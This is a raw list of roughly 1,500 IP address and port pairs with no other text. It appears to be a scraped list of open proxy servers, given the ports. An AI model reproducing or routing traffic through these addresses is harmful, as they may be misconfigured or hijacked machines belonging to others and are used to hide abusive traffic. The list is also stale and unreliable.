114.40.53.164:9064 114.40.69.242:8080 114.43.112.208:9064 114.43.167.163:9064 114.46.120.223:9064 114.47.128.122:9064 114.47.59.33:9064 114.69.229.69:8080 115.117.116.133:9064 115.124.75.150:80 115.154.191.110:3128 115.194.158.161:8118 115.228.62.182:3128 115.28.23.36:3128 115.28.236.172:3128 115.28.90.72:8080 116.10.179.55:8118 116.203.247.188:9064 116.228.7.42:8080 116.236.216.116:8080 116.255.168.29:808 117.121.204.125:8080 117.121.242.8:15275 117.136.146.87:8123 117.136.148.214:8123 117.139.149.216:8123 117.139.2.50:8123 117.139.28.236:8123 117.139.28.252:8123 117.139.28.50:8123 117.139.29.33:8123 117.139.35.89:8123 117.139.36.96:8123 117.139.38.176:8123 117.139.38.48:8123 117.139.43.174:8123 117.139.43.95:8123 117.139.44.171:8123 117.139.44.94:8123 117.139.45.131:8123 117.139.45.175:8123 117.139.45.176:8123 117.139.67.225:8123 117.139.70.128:8123 117.139.71.46:8123 117.147.229.30:8123 117.148.41.116:8123 117.148.43.158:8123 117.148.50.175:8123 117.149.217.232:8123 117.149.221.106:8123 117.149.224.141:8123 117.149.243.146:8123 117.149.247.8:8123 117.162.104.64:8123 117.162.110.148:8123 117.162.112.90:8123 117.162.116.55:8123 117.162.123.55:8123 117.162.123.66:8123 117.162.130.107:8123 117.162.132.149:8123 117.162.136.13:8123 117.162.139.103:8123 117.162.164.144:8123 117.162.165.86:8123 117.162.168.37:8123 117.162.171.180:8123 117.162.173.44:8123 117.162.175.158:8123 117.162.185.159:8123 117.162.196.153:8123 117.162.196.8:8123 117.162.199.54:8123 117.162.200.251:8123 117.162.202.70:8123 117.162.206.192:8123 117.162.208.208:8123 117.162.210.16:8123 117.162.216.45:8123 117.162.217.228:8123 117.162.225.83:8123 117.162.227.146:8123 117.162.227.252:8123 117.162.232.213:8123 117.162.234.80:8123 117.162.239.219:8123 117.162.242.178:8123 117.162.247.134:8123 117.162.253.255:8123 117.162.41.192:8123 117.162.60.38:8123 117.162.81.92:8123 117.162.82.174:8123 117.162.97.155:8123 117.163.100.252:8123 117.163.108.76:8123 117.163.112.46:8123 117.163.113.38:8123 117.163.114.154:8123 117.163.116.134:8123 117.163.118.143:8123 117.163.123.28:8123 117.163.127.224:8123 117.163.128.181:8123 117.163.129.204:8123 117.163.130.243:8123 117.163.132.85:8123 117.163.133.251:8123 117.163.137.202:8123 117.163.137.40:8123 117.163.138.122:8123 117.163.149.109:8123 117.163.150.173:8123 117.163.150.209:8123 117.163.151.144:8123 117.163.151.188:8123 117.163.154.60:8123 117.163.155.232:8123 117.163.156.218:8123 117.163.156.77:8123 117.163.157.82:8123 117.163.158.174:8123 117.163.167.37:8123 117.163.168.132:8123 117.163.169.167:8123 117.163.17.216:8123 117.163.171.42:8123 117.163.171.75:8123 117.163.179.45:8123 117.163.186.230:8123 117.163.193.73:8123 117.163.203.129:8123 117.163.203.242:8123 117.163.204.8:8123 117.163.206.203:8123 117.163.206.238:8123 117.163.214.17:8123 117.163.217.140:8123 117.163.217.158:8123 117.163.220.68:8123 117.163.221.202:8123 117.163.225.106:8123 117.163.227.165:8123 117.163.227.63:8123 117.163.228.24:8123 117.163.236.204:8123 117.163.239.150:8123 117.163.245.80:8123 117.163.252.159:8123 117.163.252.168:8123 117.163.252.240:8123 117.163.28.108:8123 117.163.30.31:8123 117.163.30.70:8123 117.163.31.117:8123 117.163.31.206:8123 117.163.4.178:8123 117.163.4.206:8123 117.163.46.153:8123 117.163.64.209:8123 117.163.64.47:8123 117.163.65.57:8123 117.163.66.84:8123 117.163.68.19:8123 117.163.69.205:8123 117.163.7.0:8123 117.163.9.136:8123 117.163.97.98:8123 117.163.98.255:8123 117.164.10.73:8123 117.164.128.243:8123 117.164.131.17:8123 117.164.133.197:8123 117.164.133.254:8123 117.164.134.168:8123 117.164.134.52:8123 117.164.134.71:8123 117.164.134.97:8123 117.164.135.206:8123 117.164.136.175:8123 117.164.136.70:8123 117.164.137.91:8123 117.164.139.166:8123 117.164.139.179:8123 117.164.139.190:8123 117.164.139.94:8123 117.164.14.185:8123 117.164.140.21:8123 117.164.142.81:8123 117.164.143.234:8123 117.164.144.32:8123 117.164.146.12:8123 117.164.146.27:8123 117.164.150.57:8123 117.164.152.234:8123 117.164.153.82:8123 117.164.156.87:8123 117.164.158.196:8123 117.164.158.59:8123 117.164.161.235:8123 117.164.167.151:8123 117.164.167.23:8123 117.164.167.32:8123 117.164.167.69:8123 117.164.171.229:8123 117.164.173.215:8123 117.164.174.158:8123 117.164.174.168:8123 117.164.174.193:8123 117.164.175.184:8123 117.164.175.233:8123 117.164.184.228:8123 117.164.186.234:8123 117.164.192.2:8123 117.164.195.89:8123 117.164.196.12:8123 117.164.196.76:8123 117.164.197.211:8123 117.164.199.127:8123 117.164.199.62:8123 117.164.201.243:8123 117.164.203.107:8123 117.164.204.222:8123 117.164.206.147:8123 117.164.206.36:8123 117.164.209.187:8123 117.164.210.209:8123 117.164.213.138:8123 117.164.214.82:8123 117.164.215.152:8123 117.164.215.224:8123 117.164.217.164:8123 117.164.227.62:8123 117.164.230.112:8123 117.164.234.113:8123 117.164.236.216:8123 117.164.245.66:8123 117.164.28.247:8123 117.164.28.86:8123 117.164.28.98:8123 117.164.29.62:8123 117.164.3.137:8123 117.164.3.2:8123 117.164.32.38:8123 117.164.37.245:8123 117.164.38.255:8123 117.164.39.251:8123 117.164.44.220:8123 117.164.44.249:8123 117.164.45.62:8123 117.164.48.196:8123 117.164.48.230:8123 117.164.49.0:8123 117.164.5.199:8123 117.164.5.234:8123 117.164.50.150:8123 117.164.54.0:8123 117.164.55.199:8123 117.164.56.193:8123 117.164.58.197:8123 117.164.59.238:8123 117.164.60.182:8123 117.164.7.94:8123 117.164.8.142:8123 117.164.95.2:8123 117.164.95.36:8123 117.165.100.8:8123 117.165.101.55:8123 117.165.102.246:8123 117.165.103.103:8123 117.165.120.32:8123 117.165.121.69:8123 117.165.122.192:8123 117.165.128.131:8123 117.165.13.231:8123 117.165.130.188:8123 117.165.131.53:8123 117.165.131.97:8123 117.165.135.141:8123 117.165.138.180:8123 117.165.139.235:8123 117.165.14.230:8123 117.165.140.147:8123 117.165.140.213:8123 117.165.143.67:8123 117.165.145.157:8123 117.165.146.116:8123 117.165.146.88:8123 117.165.148.198:8123 117.165.15.149:8123 117.165.153.56:8123 117.165.17.41:8123 117.165.178.62:8123 117.165.18.130:8123 117.165.181.197:8123 117.165.187.153:8123 117.165.198.154:8123 117.165.200.121:8123 117.165.210.53:8123 117.165.211.134:8123 117.165.217.63:8123 117.165.220.47:8123 117.165.224.122:8123 117.165.226.102:8123 117.165.228.215:8123 117.165.230.224:8123 117.165.29.13:8123 117.165.31.6:8123 117.165.32.220:8123 117.165.33.112:8123 117.165.33.115:8123 117.165.35.126:8123 117.165.39.197:8123 117.165.42.7:8123 117.165.43.16:8123 117.165.48.211:8123 117.165.49.114:8123 117.165.51.214:8123 117.165.53.44:8123 117.165.60.117:8123 117.165.62.233:8123 117.165.66.173:8123 117.165.66.5:8123 117.165.76.111:8123 117.165.79.234:8123 117.165.79.47:8123 117.165.8.165:8123 117.165.8.179:8123 117.165.8.237:8123 117.165.83.147:8123 117.165.86.192:8123 117.165.89.143:8123 117.165.89.236:8123 117.165.91.146:8123 117.165.94.70:8123 117.166.104.99:8123 117.166.105.193:8123 117.166.105.239:8123 117.166.106.220:8123 117.166.106.95:8123 117.166.109.13:8123 117.166.109.3:8123 117.166.113.194:8123 117.166.116.225:8123 117.166.120.122:8123 117.166.122.57:8123 117.166.124.185:8123 117.166.126.32:8123 117.166.159.236:8123 117.166.169.112:8123 117.166.170.136:8123 117.166.170.61:8123 117.166.172.49:8123 117.166.173.124:8123 117.166.173.227:8123 117.166.174.211:8123 117.166.18.104:8123 117.166.18.105:8123 117.166.18.150:8123 117.166.18.184:8123 117.166.185.74:8123 117.166.186.157:8123 117.166.188.117:8123 117.166.196.60:8123 117.166.197.189:8123 117.166.200.171:8123 117.166.203.204:8123 117.166.205.70:8123 117.166.206.18:8123 117.166.206.195:8123 117.166.207.163:8123 117.166.207.75:8123 117.166.212.52:8123 117.166.215.221:8123 117.166.219.20:8123 117.166.22.214:8123 117.166.220.177:8123 117.166.221.91:8123 117.166.223.197:8123 117.166.224.157:8123 117.166.225.65:8123 117.166.226.213:8123 117.166.226.47:8123 117.166.231.241:8123 117.166.234.99:8123 117.166.243.73:8123 117.166.247.178:8123 117.166.28.132:8123 117.166.34.176:8123 117.166.40.72:8123 117.166.41.199:8123 117.166.42.62:8123 117.166.44.207:8123 117.166.45.135:8123 117.166.45.18:8123 117.166.46.215:8123 117.166.47.250:8123 117.166.48.5:8123 117.166.50.238:8123 117.166.50.67:8123 117.166.52.203:8123 117.166.53.170:8123 117.166.54.126:8123 117.166.56.8:8123 117.166.56.87:8123 117.166.57.18:8123 117.166.57.82:8123 117.166.59.178:8123 117.166.68.64:8123 117.166.70.18:8123 117.166.70.197:8123 117.166.70.242:8123 117.166.73.223:8123 117.166.74.211:8123 117.166.74.247:8123 117.166.75.110:8123 117.166.75.13:8123 117.166.76.83:8123 117.166.78.65:8123 117.166.79.22:8123 117.166.79.45:8123 117.166.86.183:8123 117.166.88.179:8123 117.166.91.10:8123 117.166.93.173:8123 117.166.94.16:8123 117.166.96.215:8123 117.166.98.185:8123 117.166.99.205:8123 117.167.106.228:8123 117.167.107.68:8123 117.167.131.63:8123 117.167.133.46:8123 117.167.139.75:8123 117.167.140.2:8123 117.167.142.219:8123 117.167.142.66:8123 117.167.153.70:8123 117.167.165.118:8123 117.167.165.140:8123 117.167.168.197:8123 117.167.169.30:8123 117.167.177.65:8123 117.167.178.190:8123 117.167.181.154:8123 117.167.183.69:8123 117.167.208.117:8123 117.167.208.46:8123 117.167.212.160:8123 117.167.222.124:8123 117.167.222.72:8123 117.167.224.196:8123 117.167.225.129:8123 117.167.229.18:8123 117.167.229.50:8123 117.167.231.72:8123 117.167.232.171:8123 117.167.233.112:8123 117.167.235.211:8123 117.167.244.29:8123 117.167.40.105:8123 117.167.42.91:8123 117.167.45.174:8123 117.167.59.103:8123 117.167.6.168:8123 117.167.65.228:8123 117.167.66.184:8123 117.167.66.223:8123 117.167.67.153:8123 117.167.7.18:8123 117.167.7.193:8123 117.167.70.225:8123 117.167.8.178:8123 117.167.8.185:8123 117.167.81.254:8123 117.167.89.77:8123 117.169.152.85:8123 117.169.160.178:8123 117.169.161.185:8123 117.169.162.188:8123 117.169.162.74:8123 117.169.165.42:8123 117.169.166.76:8123 117.169.166.87:8123 117.169.166.90:8123 117.169.167.173:8123 117.169.167.3:8123 117.169.186.105:8123 117.169.187.91:8123 117.169.189.141:8123 117.169.191.155:8123 117.169.195.52:8123 117.169.200.163:8123 117.169.201.98:8123 117.169.205.29:8123 117.169.206.244:8123 117.169.206.93:8123 117.169.206.94:8123 117.169.207.212:8123 117.169.224.146:8123 117.169.225.28:8123 117.169.228.116:8123 117.169.228.132:8123 117.169.228.209:8123 117.169.228.242:8123 117.169.230.155:8123 117.169.230.230:8123 117.169.231.18:8123 117.169.232.90:8123 117.169.234.138:8123 117.169.236.136:8123 117.169.237.12:8123 117.169.237.154:8123 117.169.237.245:8123 117.169.237.28:8123 117.169.238.137:8123 117.169.238.207:8123 117.169.241.112:8123 117.169.243.226:8123 117.169.245.7:8123 117.170.104.120:8123 117.170.104.213:8123 117.170.105.35:8123 117.170.115.236:8123 117.170.119.142:8123 117.170.12.149:8123 117.170.12.231:8123 117.170.121.153:8123 117.170.121.5:8123 117.170.122.44:8123 117.170.124.110:8123 117.170.131.28:8123 117.170.132.222:8123 117.170.134.109:8123 117.170.142.195:8123 117.170.142.85:8123 117.170.143.30:8123 117.170.147.57:8123 117.170.155.73:8123 117.170.158.193:8123 117.170.172.221:8123 117.170.173.151:8123 117.170.173.250:8123 117.170.175.103:8123 117.170.176.40:8123 117.170.178.20:8123 117.170.179.149:8123 117.170.18.129:8123 117.170.18.72:8123 117.170.19.132:8123 117.170.19.230:8123 117.170.200.5:8123 117.170.206.27:8123 117.170.207.44:8123 117.170.21.105:8123 117.170.212.222:8123 117.170.214.255:8123 117.170.216.135:8123 117.170.217.117:8123 117.170.217.203:8123 117.170.217.99:8123 117.170.220.246:8123 117.170.222.206:8123 117.170.223.38:8123 117.170.223.95:8123 117.170.225.249:8123 117.170.23.32:8123 117.170.23.97:8123 117.170.230.110:8123 117.170.233.15:8123 117.170.237.2:8123 117.170.238.255:8123 117.170.242.69:8123 117.170.243.13:8123 117.170.247.61:8123 117.170.248.125:8123 117.170.248.202:8123 117.170.249.25:8123 117.170.26.134:8123 117.170.3.67:8123 117.170.31.106:8123 117.170.33.240:8123 117.170.34.50:8123 117.170.35.179:8123 117.170.4.133:8123 117.170.44.232:8123 117.170.59.92:8123 117.170.6.233:8123 117.170.7.181:8123 117.171.102.30:8123 117.171.105.56:8123 117.171.116.223:8123 117.171.119.9:8123 117.171.124.119:8123 117.171.124.134:8123 117.171.126.116:8123 117.171.131.224:8123 117.171.138.174:8123 117.171.143.203:8123 117.171.144.146:8123 117.171.145.74:8123 117.171.145.95:8123 117.171.148.164:8123 117.171.150.126:8123 117.171.153.173:8123 117.171.153.236:8123 117.171.153.47:8123 117.171.161.90:8123 117.171.162.66:8123 117.171.163.47:8123 117.171.172.239:8123 117.171.174.252:8123 117.171.174.72:8123 117.171.187.236:8123 117.171.19.82:8123 117.171.190.34:8123 117.171.22.109:8123 117.171.22.157:8123 117.171.220.48:8123 117.171.221.110:8123 117.171.224.62:8123 117.171.224.78:8123 117.171.225.237:8123 117.171.226.186:8123 117.171.226.9:8123 117.171.229.24:8123 117.171.229.253:8123 117.171.230.109:8123 117.171.230.203:8123 117.171.231.149:8123 117.171.232.71:8123 117.171.233.11:8123 117.171.234.15:8123 117.171.237.186:8123 117.171.238.86:8123 117.171.241.160:8123 117.171.241.164:8123 117.171.242.184:8123 117.171.244.170:8123 117.171.247.147:8123 117.171.247.91:8123 117.171.250.38:8123 117.171.250.84:8123 117.171.251.90:8123 117.171.29.30:8123 117.171.30.96:8123 117.171.31.161:8123 117.171.45.26:8123 117.171.49.168:8123 117.171.49.48:8123 117.171.53.182:8123 117.171.53.249:8123 117.171.54.157:8123 117.171.56.97:8123 117.171.59.31:8123 117.171.61.155:8123 117.171.66.231:8123 117.171.73.117:8123 117.171.77.121:8123 117.171.78.132:8123 117.171.86.185:8123 117.172.153.173:8123 117.172.155.187:8123 117.172.155.222:8123 117.172.155.235:8123 117.172.157.201:8123 117.172.220.213:8123 117.172.220.6:8123 117.172.222.192:8123 117.172.76.198:8123 117.172.77.138:8123 117.172.77.187:8123 117.172.78.204:8123 117.172.78.3:8123 117.173.108.188:8123 117.173.108.219:8123 117.173.110.112:8123 117.173.120.129:8123 117.173.121.55:8123 117.173.16.92:8123 117.173.18.106:8123 117.173.190.231:8123 117.173.20.115:8123 117.173.20.207:8123 117.173.20.230:8123 117.173.20.233:8123 117.173.20.43:8123 117.173.20.55:8123 117.173.20.85:8123 117.173.20.91:8123 117.173.200.247:8123 117.173.205.155:8123 117.173.21.146:8123 117.173.21.156:8123 117.173.21.165:8123 117.173.21.242:8123 117.173.21.46:8123 117.173.21.74:8123 117.173.21.88:8123 117.173.22.202:8123 117.173.22.223:8123 117.173.22.34:8123 117.173.23.125:8123 117.173.23.127:8123 117.173.23.132:8123 117.173.23.133:8123 117.173.23.14:8123 117.173.23.225:8123 117.173.23.44:8123 117.173.23.92:8123 117.173.235.138:8123 117.173.237.23:8123 117.173.238.110:8123 117.173.241.136:8123 117.173.242.242:8123 117.173.242.66:8123 117.173.244.45:8123 117.173.245.184:8123 117.173.245.55:8123 117.173.246.108:8123 117.173.246.86:8123 117.173.253.120:8123 117.173.253.133:8123 117.173.253.141:8123 117.173.253.17:8123 117.173.253.28:8123 117.173.254.142:8123 117.173.254.234:8123 117.173.254.63:8123 117.173.58.107:8123 117.173.58.136:8123 117.173.59.239:8123 117.173.59.246:8123 117.173.62.153:8123 117.173.63.170:8123 117.173.80.10:8123 117.173.80.8:8123 117.173.81.209:8123 117.173.81.236:8123 117.173.82.252:8123 117.174.1.100:8123 117.174.193.26:8123 117.174.194.135:8123 117.174.194.89:8123 117.174.195.125:8123 117.174.195.141:8123 117.174.196.191:8123 117.174.197.94:8123 117.174.199.87:8123 117.174.2.185:8123 117.174.200.170:8123 117.174.201.110:8123 117.174.201.239:8123 117.174.201.91:8123 117.174.203.137:8123 117.174.203.181:8123 117.174.203.45:8123 117.174.203.88:8123 117.174.206.166:8123 117.174.206.30:8123 117.174.207.176:8123 117.174.207.54:8123 117.174.208.147:8123 117.174.216.180:8123 117.174.217.155:8123 117.174.228.235:8123 117.174.230.24:8123 117.174.233.130:8123 117.174.237.128:8123 117.174.3.177:8123 117.175.102.140:8123 117.175.102.152:8123 117.175.102.167:8123 117.175.108.156:8123 117.175.108.190:8123 117.175.109.150:8123 117.175.109.200:8123 117.175.109.55:8123 117.175.110.168:8123 117.175.110.222:8123 117.175.111.200:8123 117.175.111.211:8123 117.175.111.38:8123 117.175.116.128:8123 117.175.116.137:8123 117.175.116.43:8123 117.175.117.136:8123 117.175.117.186:8123 117.175.119.182:8123 117.175.120.130:8123 117.175.121.26:8123 117.175.124.216:8123 117.175.124.32:8123 117.175.125.137:8123 117.175.125.38:8123 117.175.192.35:8123 117.175.197.143:8123 117.175.197.208:8123 117.175.198.97:8123 117.175.200.181:8123 117.175.213.236:8123 117.175.214.49:8123 117.175.226.199:8123 117.175.227.143:8123 117.175.227.147:8123 117.175.227.242:8123 117.175.227.7:8123 117.175.229.154:8123 117.175.229.192:8123 117.175.229.242:8123 117.175.229.4:8123 117.175.230.125:8123 117.175.230.19:8123 117.175.230.212:8123 117.175.230.224:8123 117.175.231.103:8123 117.175.231.48:8123 117.175.231.5:8123 117.175.232.109:8123 117.175.232.240:8123 117.175.232.76:8123 117.175.237.90:8123 117.175.238.85:8123 117.175.241.119:8123 117.175.241.37:8123 117.175.242.114:8123 117.175.242.213:8123 117.175.243.178:8123 117.175.243.186:8123 117.175.243.21:8123 117.175.243.42:8123 117.175.243.49:8123 117.175.243.73:8123 117.175.33.55:8123 117.175.33.73:8123 117.175.34.213:8123 117.175.34.3:8123 117.175.35.142:8123 117.175.37.106:8123 117.175.37.33:8123 117.175.37.57:8123 117.175.39.170:8123 117.175.39.198:8123 117.175.39.4:8123 117.175.45.136:8123 117.175.48.80:8123 117.175.49.37:8123 117.175.52.81:8123 117.175.60.135:8123 117.175.60.74:8123 117.175.62.182:8123 117.175.9.217:8123 117.175.99.182:8123 117.176.105.218:8123 117.176.11.220:8123 117.176.11.243:8123 117.176.110.187:8123 117.176.110.69:8123 117.176.110.90:8123 117.176.164.18:8123 117.176.165.177:8123 117.176.185.128:8123 117.176.185.220:8123 117.176.185.36:8123 117.176.188.128:8123 117.176.189.231:8123 117.176.189.47:8123 117.176.189.48:8123 117.176.189.90:8123 117.176.191.10:8123 117.176.191.142:8123 117.176.191.160:8123 117.176.191.213:8123 117.176.191.234:8123 117.176.2.251:8123 117.176.221.107:8123 117.176.221.63:8123 117.176.233.28:8123 117.176.28.49:8123 117.176.29.190:8123 117.176.29.250:8123 117.176.3.218:8123 117.176.32.224:8123 117.176.33.176:8123 117.176.4.137:8123 117.177.16.189:8123 117.177.161.37:8123 117.177.164.147:8123 117.177.166.27:8123 117.177.167.119:8123 117.177.167.70:8123 117.177.170.110:8123 117.177.170.26:8123 117.177.171.165:8123 117.177.171.87:8123 117.177.172.129:8123 117.177.172.193:8123 117.177.172.228:8123 117.177.174.231:8123 117.177.174.30:8123 117.177.174.59:8123 117.177.232.218:8123 117.177.232.60:8123 117.177.240.43:80 117.177.28.217:8123 117.177.44.125:8123 117.177.44.229:8123 117.177.45.101:8123 117.177.45.193:8123 117.177.45.209:8123 117.177.46.4:8123 117.194.194.28:9064 117.200.34.222:9064 117.201.97.47:9064 117.203.144.56:9064 117.203.253.139:9064 117.205.18.128:9064 117.208.244.165:9064 117.208.63.137:9064 117.215.230.243:9064 117.220.248.233:9064 117.239.2.116:3128 117.27.157.111:8081 117.7.149.96:9064 118.126.142.209:3128 118.136.50.28:9064 118.144.151.145:3128 118.144.50.254:3128 118.161.11.27:9064 118.161.194.55:9064 118.166.215.68:9064 118.167.142.135:9064 118.169.115.219:9064 118.169.51.133:9064 118.170.37.94:9064 118.170.54.161:9064 118.171.112.66:9064 118.171.117.84:9064 118.69.202.73:3128 118.97.131.58:9064 118.97.30.178:3128 119.40.98.26:8080 119.80.160.50:80 119.80.86.128:8080 119.81.148.196:3128 119.90.127.4:80 119.97.164.48:8085 120.131.128.214:80 120.131.128.215:80 120.131.70.216:3128 120.197.234.166:80 120.197.53.195:8080 120.199.241.115:8123 120.199.243.15:8123 120.199.246.103:8123 120.199.249.219:8123 120.202.249.230:80 120.203.153.153:8123 120.203.161.239:8123 120.203.161.8:8123 120.203.162.91:8123 120.203.165.188:8123 120.203.233.179:8123 120.203.239.162:8123 120.206.104.18:8123 120.206.133.130:8123 120.206.136.110:8123 120.206.137.207:8123 120.206.142.199:8123 120.206.143.124:8123 120.206.144.132:8123 120.206.146.113:8123 120.206.150.61:8123 120.206.150.67:8123 120.206.169.19:8123 120.206.177.17:8123 120.206.182.49:8123 120.206.183.149:8123 120.206.185.132:8123 120.206.185.26:8123 120.206.187.101:8123 120.206.187.77:8123 120.206.196.112:8123 120.206.196.59:8123 120.206.196.85:8123 120.206.197.179:8123 120.206.214.161:8123 120.206.228.196:8123 120.206.72.134:8123 120.206.72.153:8123 120.206.72.206:8123 120.206.73.150:8123 120.206.73.18:8123 120.206.73.87:8123 120.206.76.117:8123 120.206.78.235:8123 120.24.216.244:80 120.27.51.123:8888 120.27.54.137:3128 120.83.5.164:18000 121.207.252.105:3128 121.21.60.138:8118 121.31.202.65:80 122.118.165.57:9064 122.118.176.237:9064 122.121.108.242:9064 123.0.45.124:9064 123.125.19.44:80 123.127.237.162:80 123.190.46.20:8080 124.11.174.202:9064 124.125.29.156:9064 124.155.246.122:9064 124.161.94.8:80 124.192.148.14:8080 124.207.175.91:8080 124.248.177.17:8080 124.248.184.119:80 124.248.184.119:8080 124.6.135.170:3128 124.95.163.102:80 125.164.137.222:8080 125.164.64.190:8080 125.230.60.31:9064 125.38.11.123:8118 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.69:80 125.63.97.164:9064 125.92.173.93:8118 131.221.114.163:9064 134.119.24.44:3128 138.91.248.44:3128 139.193.191.35:9064 14.153.224.17:9999 14.96.64.236:9064 14.96.92.27:9064 14.99.149.123:9064 14.99.18.70:9064 140.120.90.81:9064 141.105.164.239:8080 143.89.225.246:3128 150.187.5.100:8080 159.8.36.242:3128 162.246.23.9:3128 163.125.159.250:9999 163.125.199.14:8888 163.142.72.17:8080 164.138.237.254:80 165.24.10.16:8080 166.78.162.23:3128 175.138.47.185:8080 177.102.5.170:9064 177.103.27.135:9064 177.131.53.105:8080 177.137.108.135:9064 177.142.118.227:8080 177.180.248.163:9064 177.183.225.28:9064 177.206.43.197:8080 177.22.111.113:3128 177.36.214.222:8080 177.82.27.139:9064 177.99.164.162:8080 178.62.184.237:3128 179.171.53.31:9064 179.192.121.62:8080 179.213.190.184:9064 179.218.251.74:8080 179.235.187.39:9064 179.244.251.72:9064 179.56.81.148:9064 179.57.70.128:9064 180.247.133.59:8080 180.248.75.34:8080 180.253.148.206:8080 180.254.252.51:8080 180.254.92.222:8080 180.76.146.12:3128 181.208.101.216:9064 181.225.60.174:8080 181.225.61.64:8080 181.225.61.65:8080 181.49.15.162:3128 181.49.15.166:3128 181.61.196.57:3128 181.74.166.4:9064 182.109.92.183:8123 182.135.64.132:63000 182.234.130.104:9064 182.234.240.247:9064 182.253.121.243:8080 182.253.32.108:8080 182.253.73.115:8080 182.74.34.134:8080 183.129.194.87:3128 183.188.17.90:8118 183.203.22.182:80 183.203.22.183:80 183.203.22.184:80 183.203.22.185:80 183.206.71.177:8123 183.206.71.27:8123 183.206.73.62:8123 183.206.74.161:8123 183.206.74.253:8123 183.206.76.130:8123 183.206.87.85:8123 183.207.232.119:8080 183.207.232.193:8080 183.207.232.194:8080 183.208.185.94:8123 183.208.202.212:8123 183.208.214.200:8123 183.208.217.38:8123 183.208.222.143:8123 183.208.32.165:8123 183.208.37.218:8123 183.208.59.239:8123 183.209.107.19:8123 183.209.107.212:8123 183.209.16.240:8123 183.209.187.72:8123 183.209.231.11:8123 183.209.233.23:8118 183.209.236.220:8123 183.209.236.82:8123 183.210.0.10:8123 183.210.0.172:8123 183.210.1.59:8123 183.210.251.145:8123 183.210.253.98:8123 183.210.9.173:8123 183.211.1.220:8123 183.211.124.98:8123 183.211.13.20:8123 183.211.152.94:8123 183.211.153.57:8123 183.211.70.177:8123 183.211.73.120:8123 183.211.74.187:8123 183.211.77.103:8123 183.212.113.225:8123 183.212.114.163:8123 183.212.12.247:8123 183.212.123.227:8123 183.212.143.62:8123 183.212.153.84:8123 183.212.154.168:8123 183.212.67.153:8123 183.213.147.41:8123 183.213.159.192:8123 183.216.106.1:8123 183.216.127.168:8123 183.216.161.157:8123 183.216.163.172:8123 183.216.163.93:8123 183.216.164.238:8123 183.216.164.53:8123 183.216.165.205:8123 183.216.165.84:8123 183.216.166.78:8123 183.216.170.72:8123 183.216.171.225:8123 183.216.172.121:8123 183.216.175.42:8123 183.216.176.134:8123 183.216.176.163:8123 183.216.178.202:8123 183.216.185.116:8123 183.216.185.186:8123 183.216.187.16:8123 183.216.187.39:8123 183.216.187.44:8123 183.216.188.209:8123 183.216.225.2:8123 183.216.228.250:8123 183.216.239.171:8123 183.216.239.18:8123 183.216.239.45:8123 183.216.240.180:8123 183.216.243.2:8123 183.216.244.234:8123 183.216.245.45:8123 183.216.248.27:8123 183.216.248.28:8123 183.216.249.142:8123 183.216.251.24:8123 183.216.252.232:8123 183.216.99.71:8123 183.217.103.158:8123 183.217.137.233:8123 183.217.176.20:8123 183.217.187.2:8123 183.217.188.201:8123 183.217.188.93:8123 183.217.195.108:8123 183.217.197.167:8123 183.217.198.159:8123 183.217.207.191:8123 183.217.228.23:8123 183.217.228.42:8123 183.217.232.112:8123 183.217.243.14:8123 183.217.243.21:8123 183.217.31.206:8123 183.217.66.91:8123 183.218.106.154:8123 183.218.127.164:8123 183.218.13.175:8123 183.218.13.85:8123 183.218.71.97:8123 183.218.86.238:8123 183.218.86.239:8123 183.218.87.70:8123 183.219.102.248:8123 183.219.102.46:8123 183.219.138.73:8123 183.219.139.207:8123 183.219.140.140:8123 183.219.146.105:8123 183.219.147.192:8123 183.219.150.119:8123 183.219.150.175:8123 183.219.152.217:8123 183.219.154.250:8123 183.219.155.196:8123 183.219.156.124:8123 183.219.157.176:8123 183.219.158.49:8123 183.219.160.95:8123 183.219.163.70:8123 183.219.168.128:8123 183.219.174.142:8123 183.219.248.92:8123 183.219.27.26:8123 183.219.28.110:8123 183.219.3.106:8123 183.219.3.157:8123 183.219.3.210:8123 183.219.30.172:8123 183.219.30.204:8123 183.219.32.32:8123 183.219.4.231:8123 183.219.46.154:8123 183.219.50.52:8123 183.219.50.58:8123 183.219.52.85:8123 183.219.55.106:8123 183.219.58.241:8123 183.219.59.114:8123 183.219.59.21:8123 183.219.84.50:8123 183.219.91.227:8123 183.219.91.97:8123 183.219.92.230:8123 183.219.92.30:8123 183.219.93.196:8123 183.219.93.77:8123 183.219.94.245:8123 183.219.94.253:8123 183.22.244.181:9999 183.220.134.12:8123 183.220.157.161:8123 183.220.157.198:8123 183.220.159.60:8123 183.220.161.43:8123 183.220.172.206:8123 183.220.172.233:8123 183.220.172.38:8123 183.220.172.60:8123 183.220.172.62:8123 183.220.192.35:8123 183.220.199.98:8123 183.220.228.55:8123 183.220.228.9:8123 183.220.230.230:8123 183.220.234.232:8123 183.220.234.233:8123 183.220.234.32:8123 183.220.237.164:8123 183.220.240.109:8123 183.220.240.9:8123 183.220.241.103:8123 183.220.244.115:8123 183.220.244.138:8123 183.220.244.17:8123 183.220.244.54:8123 183.220.245.151:8123 183.220.245.159:8123 183.220.245.243:8123 183.220.245.89:8123 183.220.246.241:8123 183.220.247.22:8123 183.220.40.155:8123 183.220.44.84:8123 183.220.45.33:8123 183.220.45.52:8123 183.220.46.103:8123 183.220.46.190:8123 183.221.146.26:8123 183.221.147.172:8123 183.221.160.100:8123 183.221.160.198:8123 183.221.160.38:8123 183.221.162.113:8123 183.221.172.145:8123 183.221.185.107:8123 183.221.187.122:8123 183.221.187.6:8123 183.221.187.74:8123 183.221.190.112:8123 183.221.190.51:8123 183.221.217.221:8123 183.221.217.34:8123 183.221.220.29:8123 183.221.50.64:8123 183.221.53.94:8123 183.221.54.91:8123 183.222.101.251:8123 183.222.152.168:8123 183.222.152.202:8123 183.222.152.236:8123 183.222.152.42:8123 183.222.152.70:8123 183.222.152.90:8123 183.222.153.14:8123 183.222.153.145:8123 183.222.153.204:8123 183.222.153.207:8123 183.222.153.218:8123 183.222.153.54:8123 183.222.153.61:8123 183.222.153.8:8123 183.222.154.26:8123 183.222.154.48:8123 183.222.154.68:8123 183.222.154.77:8123 183.222.155.107:8123 183.222.155.19:8123 183.222.155.225:8123 183.222.155.69:8123 183.222.155.75:8123 183.222.156.12:8123 183.222.156.15:8123 183.222.156.150:8123 183.222.156.217:8123 183.222.156.53:8123 183.222.157.124:8123 183.222.157.154:8123 183.222.157.164:8123 183.222.157.231:8123 183.222.157.243:8123 183.222.157.3:8123 183.222.157.37:8123 183.222.157.47:8123 183.222.157.55:8123 183.222.158.119:8123 183.222.158.206:8123 183.222.158.224:8123 183.222.158.30:8123 183.222.158.44:8123 183.222.158.5:8123 